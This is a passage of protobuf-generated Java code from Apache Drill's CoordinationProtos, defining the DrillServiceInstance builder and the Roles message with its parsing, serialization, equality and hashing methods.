if (!unknownFields.equals(other.unknownFields)) return false;
return true;
}
@java.lang.Override
public int hashCode() {
if (memoizedHashCode != 0) {
return memoizedHashCode;
}
int hash = 41;
hash = (19 * hash) + getDescriptor().hashCode();
if (hasId()) {
hash = (37 * hash) + ID_FIELD_NUMBER;
hash = (53 * hash) + getId().hashCode();
}
if (hasRegistrationTimeUTC()) {
hash = (37 * hash) + REGISTRATIONTIMEUTC_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashLong(
getRegistrationTimeUTC());
}
if (hasEndpoint()) {
hash = (37 * hash) + ENDPOINT_FIELD_NUMBER;
hash = (53 * hash) + getEndpoint().hashCode();
}
hash = (29 * hash) + unknownFields.hashCode();
memoizedHashCode = hash;
return hash;
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
java.nio.ByteBuffer data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
java.nio.ByteBuffer data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
byte[] data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseDelimitedFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseDelimitedFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
com.google.protobuf.CodedInputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
@java.lang.Override
public Builder newBuilderForType() { return newBuilder(); }
public static Builder newBuilder() {
return DEFAULT_INSTANCE.toBuilder();
}
public static Builder newBuilder(org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance prototype) {
return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
}
@java.lang.Override
public Builder toBuilder() {
return this == DEFAULT_INSTANCE
? new Builder() : new Builder().mergeFrom(this);
}
@java.lang.Override
protected Builder newBuilderForType(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
/**
* Protobuf type {@code exec.DrillServiceInstance}
*/
public static final class Builder extends
com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements
// @@protoc_insertion_point(builder_implements:exec.DrillServiceInstance)
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstanceOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillServiceInstance_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillServiceInstance_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.class, org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.Builder.class);
}
// Construct using org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(
com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessageV3
.alwaysUseFieldBuilders) {
getEndpointFieldBuilder();
}
}
@java.lang.Override
public Builder clear() {
super.clear();
id_ = "";
bitField0_ = (bitField0_ & ~0x00000001);
registrationTimeUTC_ = 0L;
bitField0_ = (bitField0_ & ~0x00000002);
if (endpointBuilder_ == null) {
endpoint_ = null;
} else {
endpointBuilder_.clear();
}
bitField0_ = (bitField0_ & ~0x00000004);
return this;
}
@java.lang.Override
public com.google.protobuf.Descriptors.Descriptor
getDescriptorForType() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_DrillServiceInstance_descriptor;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance getDefaultInstanceForType() {
return org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.getDefaultInstance();
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance build() {
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance buildPartial() {
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance result = new org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance(this);
int from_bitField0_ = bitField0_;
int to_bitField0_ = 0;
if (((from_bitField0_ & 0x00000001) != 0)) {
to_bitField0_ |= 0x00000001;
}
result.id_ = id_;
if (((from_bitField0_ & 0x00000002) != 0)) {
result.registrationTimeUTC_ = registrationTimeUTC_;
to_bitField0_ |= 0x00000002;
}
if (((from_bitField0_ & 0x00000004) != 0)) {
if (endpointBuilder_ == null) {
result.endpoint_ = endpoint_;
} else {
result.endpoint_ = endpointBuilder_.build();
}
to_bitField0_ |= 0x00000004;
}
result.bitField0_ = to_bitField0_;
onBuilt();
return result;
}
@java.lang.Override
public Builder clone() {
return super.clone();
}
@java.lang.Override
public Builder setField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.setField(field, value);
}
@java.lang.Override
public Builder clearField(
com.google.protobuf.Descriptors.FieldDescriptor field) {
return super.clearField(field);
}
@java.lang.Override
public Builder clearOneof(
com.google.protobuf.Descriptors.OneofDescriptor oneof) {
return super.clearOneof(oneof);
}
@java.lang.Override
public Builder setRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
int index, java.lang.Object value) {
return super.setRepeatedField(field, index, value);
}
@java.lang.Override
public Builder addRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field,
java.lang.Object value) {
return super.addRepeatedField(field, value);
}
@java.lang.Override
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance) {
return mergeFrom((org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance)other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance other) {
if (other == org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance.getDefaultInstance()) return this;
if (other.hasId()) {
bitField0_ |= 0x00000001;
id_ = other.id_;
onChanged();
}
if (other.hasRegistrationTimeUTC()) {
setRegistrationTimeUTC(other.getRegistrationTimeUTC());
}
if (other.hasEndpoint()) {
mergeEndpoint(other.getEndpoint());
}
this.mergeUnknownFields(other.unknownFields);
onChanged();
return this;
}
@java.lang.Override
public final boolean isInitialized() {
return true;
}
@java.lang.Override
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage = (org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance) e.getUnfinishedMessage();
throw e.unwrapIOException();
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
private int bitField0_;
private java.lang.Object id_ = "";
/**
* <code>optional string id = 1;</code>
* @return Whether the id field is set.
*/
public boolean hasId() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional string id = 1;</code>
* @return The id.
*/
public java.lang.String getId() {
java.lang.Object ref = id_;
if (!(ref instanceof java.lang.String)) {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
id_ = s;
}
return s;
} else {
return (java.lang.String) ref;
}
}
/**
* <code>optional string id = 1;</code>
* @return The bytes for id.
*/
public com.google.protobuf.ByteString
getIdBytes() {
java.lang.Object ref = id_;
if (ref instanceof String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
id_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
/**
* <code>optional string id = 1;</code>
* @param value The id to set.
* @return This builder for chaining.
*/
public Builder setId(
java.lang.String value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000001;
id_ = value;
onChanged();
return this;
}
/**
* <code>optional string id = 1;</code>
* @return This builder for chaining.
*/
public Builder clearId() {
bitField0_ = (bitField0_ & ~0x00000001);
id_ = getDefaultInstance().getId();
onChanged();
return this;
}
/**
* <code>optional string id = 1;</code>
* @param value The bytes for id to set.
* @return This builder for chaining.
*/
public Builder setIdBytes(
com.google.protobuf.ByteString value) {
if (value == null) {
throw new NullPointerException();
}
bitField0_ |= 0x00000001;
id_ = value;
onChanged();
return this;
}
private long registrationTimeUTC_ ;
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return Whether the registrationTimeUTC field is set.
*/
public boolean hasRegistrationTimeUTC() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return The registrationTimeUTC.
*/
public long getRegistrationTimeUTC() {
return registrationTimeUTC_;
}
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @param value The registrationTimeUTC to set.
* @return This builder for chaining.
*/
public Builder setRegistrationTimeUTC(long value) {
bitField0_ |= 0x00000002;
registrationTimeUTC_ = value;
onChanged();
return this;
}
/**
* <code>optional int64 registrationTimeUTC = 2;</code>
* @return This builder for chaining.
*/
public Builder clearRegistrationTimeUTC() {
bitField0_ = (bitField0_ & ~0x00000002);
registrationTimeUTC_ = 0L;
onChanged();
return this;
}
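      // As with roles in DrillbitEndpoint.Builder, the endpoint message is held directly
      // in endpoint_ until getEndpointFieldBuilder() lazily creates endpointBuilder_,
      // after which all access goes through the field builder.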
private org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint endpoint_;
private com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder> endpointBuilder_;
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return Whether the endpoint field is set.
*/
public boolean hasEndpoint() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
* @return The endpoint.
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint getEndpoint() {
if (endpointBuilder_ == null) {
return endpoint_ == null ? org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance() : endpoint_;
} else {
return endpointBuilder_.getMessage();
}
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public Builder setEndpoint(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint value) {
if (endpointBuilder_ == null) {
if (value == null) {
throw new NullPointerException();
}
endpoint_ = value;
onChanged();
} else {
endpointBuilder_.setMessage(value);
}
bitField0_ |= 0x00000004;
return this;
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public Builder setEndpoint(
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder builderForValue) {
if (endpointBuilder_ == null) {
endpoint_ = builderForValue.build();
onChanged();
} else {
endpointBuilder_.setMessage(builderForValue.build());
}
bitField0_ |= 0x00000004;
return this;
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public Builder mergeEndpoint(org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint value) {
if (endpointBuilder_ == null) {
if (((bitField0_ & 0x00000004) != 0) &&
endpoint_ != null &&
endpoint_ != org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance()) {
endpoint_ =
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.newBuilder(endpoint_).mergeFrom(value).buildPartial();
} else {
endpoint_ = value;
}
onChanged();
} else {
endpointBuilder_.mergeFrom(value);
}
bitField0_ |= 0x00000004;
return this;
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public Builder clearEndpoint() {
if (endpointBuilder_ == null) {
endpoint_ = null;
onChanged();
} else {
endpointBuilder_.clear();
}
bitField0_ = (bitField0_ & ~0x00000004);
return this;
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder getEndpointBuilder() {
bitField0_ |= 0x00000004;
onChanged();
return getEndpointFieldBuilder().getBuilder();
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
public org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder getEndpointOrBuilder() {
if (endpointBuilder_ != null) {
return endpointBuilder_.getMessageOrBuilder();
} else {
return endpoint_ == null ?
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.getDefaultInstance() : endpoint_;
}
}
/**
* <code>optional .exec.DrillbitEndpoint endpoint = 3;</code>
*/
private com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder>
getEndpointFieldBuilder() {
if (endpointBuilder_ == null) {
endpointBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpoint.Builder, org.apache.drill.exec.proto.CoordinationProtos.DrillbitEndpointOrBuilder>(
getEndpoint(),
getParentForChildren(),
isClean());
endpoint_ = null;
}
return endpointBuilder_;
}
@java.lang.Override
public final Builder setUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.setUnknownFields(unknownFields);
}
@java.lang.Override
public final Builder mergeUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.mergeUnknownFields(unknownFields);
}
// @@protoc_insertion_point(builder_scope:exec.DrillServiceInstance)
}
// @@protoc_insertion_point(class_scope:exec.DrillServiceInstance)
private static final org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance DEFAULT_INSTANCE;
static {
DEFAULT_INSTANCE = new org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance();
}
public static org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance getDefaultInstance() {
return DEFAULT_INSTANCE;
}
@java.lang.Deprecated public static final com.google.protobuf.Parser<DrillServiceInstance>
PARSER = new com.google.protobuf.AbstractParser<DrillServiceInstance>() {
@java.lang.Override
public DrillServiceInstance parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new DrillServiceInstance(input, extensionRegistry);
}
};
public static com.google.protobuf.Parser<DrillServiceInstance> parser() {
return PARSER;
}
@java.lang.Override
public com.google.protobuf.Parser<DrillServiceInstance> getParserForType() {
return PARSER;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.DrillServiceInstance getDefaultInstanceForType() {
return DEFAULT_INSTANCE;
}
}
public interface RolesOrBuilder extends
// @@protoc_insertion_point(interface_extends:exec.Roles)
com.google.protobuf.MessageOrBuilder {
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return Whether the sqlQuery field is set.
*/
boolean hasSqlQuery();
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return The sqlQuery.
*/
boolean getSqlQuery();
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return Whether the logicalPlan field is set.
*/
boolean hasLogicalPlan();
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return The logicalPlan.
*/
boolean getLogicalPlan();
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return Whether the physicalPlan field is set.
*/
boolean hasPhysicalPlan();
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return The physicalPlan.
*/
boolean getPhysicalPlan();
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return Whether the javaExecutor field is set.
*/
boolean hasJavaExecutor();
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return The javaExecutor.
*/
boolean getJavaExecutor();
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return Whether the distributedCache field is set.
*/
boolean hasDistributedCache();
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return The distributedCache.
*/
boolean getDistributedCache();
}
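  // All five Roles flags are declared with [default = true] in the schema, which the
  // no-argument constructor below reproduces by initializing each field to true.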
/**
* Protobuf type {@code exec.Roles}
*/
public static final class Roles extends
com.google.protobuf.GeneratedMessageV3 implements
// @@protoc_insertion_point(message_implements:exec.Roles)
RolesOrBuilder {
private static final long serialVersionUID = 0L;
// Use Roles.newBuilder() to construct.
private Roles(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
super(builder);
}
private Roles() {
sqlQuery_ = true;
logicalPlan_ = true;
physicalPlan_ = true;
javaExecutor_ = true;
distributedCache_ = true;
}
@java.lang.Override
@SuppressWarnings({"unused"})
protected java.lang.Object newInstance(
UnusedPrivateParameter unused) {
return new Roles();
}
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet
getUnknownFields() {
return this.unknownFields;
}
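    // The five boolean fields all use varint encoding, so their tags are 8, 16, 24, 32
    // and 40 ((field_number << 3) | 0 for fields 1 through 5), matching the cases below.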
private Roles(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
this();
if (extensionRegistry == null) {
throw new java.lang.NullPointerException();
}
int mutable_bitField0_ = 0;
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
case 8: {
bitField0_ |= 0x00000001;
sqlQuery_ = input.readBool();
break;
}
case 16: {
bitField0_ |= 0x00000002;
logicalPlan_ = input.readBool();
break;
}
case 24: {
bitField0_ |= 0x00000004;
physicalPlan_ = input.readBool();
break;
}
case 32: {
bitField0_ |= 0x00000008;
javaExecutor_ = input.readBool();
break;
}
case 40: {
bitField0_ |= 0x00000010;
distributedCache_ = input.readBool();
break;
}
default: {
if (!parseUnknownField(
input, unknownFields, extensionRegistry, tag)) {
done = true;
}
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(
e).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_Roles_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return org.apache.drill.exec.proto.CoordinationProtos.internal_static_exec_Roles_fieldAccessorTable
.ensureFieldAccessorsInitialized(
org.apache.drill.exec.proto.CoordinationProtos.Roles.class, org.apache.drill.exec.proto.CoordinationProtos.Roles.Builder.class);
}
private int bitField0_;
public static final int SQL_QUERY_FIELD_NUMBER = 1;
private boolean sqlQuery_;
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return Whether the sqlQuery field is set.
*/
public boolean hasSqlQuery() {
return ((bitField0_ & 0x00000001) != 0);
}
/**
* <code>optional bool sql_query = 1 [default = true];</code>
* @return The sqlQuery.
*/
public boolean getSqlQuery() {
return sqlQuery_;
}
public static final int LOGICAL_PLAN_FIELD_NUMBER = 2;
private boolean logicalPlan_;
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return Whether the logicalPlan field is set.
*/
public boolean hasLogicalPlan() {
return ((bitField0_ & 0x00000002) != 0);
}
/**
* <code>optional bool logical_plan = 2 [default = true];</code>
* @return The logicalPlan.
*/
public boolean getLogicalPlan() {
return logicalPlan_;
}
public static final int PHYSICAL_PLAN_FIELD_NUMBER = 3;
private boolean physicalPlan_;
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return Whether the physicalPlan field is set.
*/
public boolean hasPhysicalPlan() {
return ((bitField0_ & 0x00000004) != 0);
}
/**
* <code>optional bool physical_plan = 3 [default = true];</code>
* @return The physicalPlan.
*/
public boolean getPhysicalPlan() {
return physicalPlan_;
}
public static final int JAVA_EXECUTOR_FIELD_NUMBER = 4;
private boolean javaExecutor_;
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return Whether the javaExecutor field is set.
*/
public boolean hasJavaExecutor() {
return ((bitField0_ & 0x00000008) != 0);
}
/**
* <code>optional bool java_executor = 4 [default = true];</code>
* @return The javaExecutor.
*/
public boolean getJavaExecutor() {
return javaExecutor_;
}
public static final int DISTRIBUTED_CACHE_FIELD_NUMBER = 5;
private boolean distributedCache_;
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return Whether the distributedCache field is set.
*/
public boolean hasDistributedCache() {
return ((bitField0_ & 0x00000010) != 0);
}
/**
* <code>optional bool distributed_cache = 5 [default = true];</code>
* @return The distributedCache.
*/
public boolean getDistributedCache() {
return distributedCache_;
}
private byte memoizedIsInitialized = -1;
@java.lang.Override
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
memoizedIsInitialized = 1;
return true;
}
@java.lang.Override
public void writeTo(com.google.protobuf.CodedOutputStream output)
throws java.io.IOException {
if (((bitField0_ & 0x00000001) != 0)) {
output.writeBool(1, sqlQuery_);
}
if (((bitField0_ & 0x00000002) != 0)) {
output.writeBool(2, logicalPlan_);
}
if (((bitField0_ & 0x00000004) != 0)) {
output.writeBool(3, physicalPlan_);
}
if (((bitField0_ & 0x00000008) != 0)) {
output.writeBool(4, javaExecutor_);
}
if (((bitField0_ & 0x00000010) != 0)) {
output.writeBool(5, distributedCache_);
}
unknownFields.writeTo(output);
}
@java.lang.Override
public int getSerializedSize() {
int size = memoizedSize;
if (size != -1) return size;
size = 0;
if (((bitField0_ & 0x00000001) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(1, sqlQuery_);
}
if (((bitField0_ & 0x00000002) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(2, logicalPlan_);
}
if (((bitField0_ & 0x00000004) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(3, physicalPlan_);
}
if (((bitField0_ & 0x00000008) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(4, javaExecutor_);
}
if (((bitField0_ & 0x00000010) != 0)) {
size += com.google.protobuf.CodedOutputStream
.computeBoolSize(5, distributedCache_);
}
size += unknownFields.getSerializedSize();
memoizedSize = size;
return size;
}
@java.lang.Override
public boolean equals(final java.lang.Object obj) {
if (obj == this) {
return true;
}
if (!(obj instanceof org.apache.drill.exec.proto.CoordinationProtos.Roles)) {
return super.equals(obj);
}
org.apache.drill.exec.proto.CoordinationProtos.Roles other = (org.apache.drill.exec.proto.CoordinationProtos.Roles) obj;
if (hasSqlQuery() != other.hasSqlQuery()) return false;
if (hasSqlQuery()) {
if (getSqlQuery()
!= other.getSqlQuery()) return false;
}
if (hasLogicalPlan() != other.hasLogicalPlan()) return false;
if (hasLogicalPlan()) {
if (getLogicalPlan()
!= other.getLogicalPlan()) return false;
}
if (hasPhysicalPlan() != other.hasPhysicalPlan()) return false;
if (hasPhysicalPlan()) {
if (getPhysicalPlan()
!= other.getPhysicalPlan()) return false;
}
if (hasJavaExecutor() != other.hasJavaExecutor()) return false;
if (hasJavaExecutor()) {
if (getJavaExecutor()
!= other.getJavaExecutor()) return false;
}
if (hasDistributedCache() != other.hasDistributedCache()) return false;
if (hasDistributedCache()) {
if (getDistributedCache()
!= other.getDistributedCache()) return false;
}
if (!unknownFields.equals(other.unknownFields)) return false;
return true;
}
@java.lang.Override
public int hashCode() {
if (memoizedHashCode != 0) {
return memoizedHashCode;
}
int hash = 41;
hash = (19 * hash) + getDescriptor().hashCode();
if (hasSqlQuery()) {
hash = (37 * hash) + SQL_QUERY_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getSqlQuery());
}
if (hasLogicalPlan()) {
hash = (37 * hash) + LOGICAL_PLAN_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getLogicalPlan());
}
if (hasPhysicalPlan()) {
hash = (37 * hash) + PHYSICAL_PLAN_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getPhysicalPlan());
}
if (hasJavaExecutor()) {
hash = (37 * hash) + JAVA_EXECUTOR_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getJavaExecutor());
}
if (hasDistributedCache()) {
hash = (37 * hash) + DISTRIBUTED_CACHE_FIELD_NUMBER;
hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean(
getDistributedCache());
}
hash = (29 * hash) + unknownFields.hashCode();
memoizedHashCode = hash;
return hash;
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
java.nio.ByteBuffer data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
java.nio.ByteBuffer data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
byte[] data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseWithIOException(PARSER, input, extensionRegistry);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseDelimitedFrom(java.io.InputStream input)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3
.parseDelimitedWithIOException(PARSER, input);
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles parseDelimitedFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
